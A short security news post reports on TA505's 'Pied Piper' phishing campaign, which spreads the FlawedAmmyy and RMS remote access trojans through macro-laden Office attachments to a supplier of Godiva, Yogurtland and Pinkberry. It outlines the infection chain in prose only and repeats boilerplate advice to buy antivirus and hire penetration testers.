The hacker group known as TA505 is behind the ongoing phishing campaign that uses the FlawedAmmyy and Remote Manipulator (RMS) remote access Trojans to infect victims.
The campaign named Pied Piper is targeting a supplier of several well-known food chains, including Godiva Chocolates, Yogurtland, and Pinkberry.
TA505 group is well known for their specialization in developing and using banking malware and ransomware; but recently the same group is showing a growing interest in RAT malware, by developing a newly discovered remote access trojan named tRAT.
The TA505’s tRAT campaign is not the only one around the cyberspace; the specialists are saying that there are many other phishing campaigns which are leveraging the Ammyy Admin RAT;
Remember everything can be hacked. In order to stay away from any threats related to the cyber world, we recommend the install of antivirus for Windows or antivirus for Mac on every device that you own, depending on which OS your device is running. If you are a company, it is also recommended to hire every year a specialized cybersecurity company that will run annual tests on your company’s network. These tests include penetration testing and ethical hacking tests;
The Pier Piper phishing scheme relays on distributing Microsoft Office documents as attachments, that are used to trick victims into enabling malicious macros that execute the infection chain.
Once a macro is enabled, it installs a scheduled task that executes the next step. This next step consists in executing a PowerShell command that downloads an MSI installer which contains an executable downloader named MYEXE. This downloader is used to search the infected machines for AV solutions and then downloads the main payload as a temp file.
After conducting a malware analysis on this new threat researchers declared that FlawedAmmyy gives hackers full access to the victim’s PC, allowing them to steal files, credentials, collect screengrabs and access the camera and microphone. Hackers can also move laterally through the network, serving as a potential entry point for a major supply chain attack.
Keep in mind that our modern society is dependent on computers, mobile devices, and the use of the internet always stay safe and secured.
We would continue to monitor the cybersecurity world. Meanwhile, users should keep a keen eye out for any cyber attacks. Remember to use an antivirus for Windows or antivirus for Mac in every device that you own, depending on which OS your machine is running, If you are a company we recommend to hire every year a specialized cybersecurity company that will run annual tests on your company’s network, tests like this include: penetration testing and ethical hacking.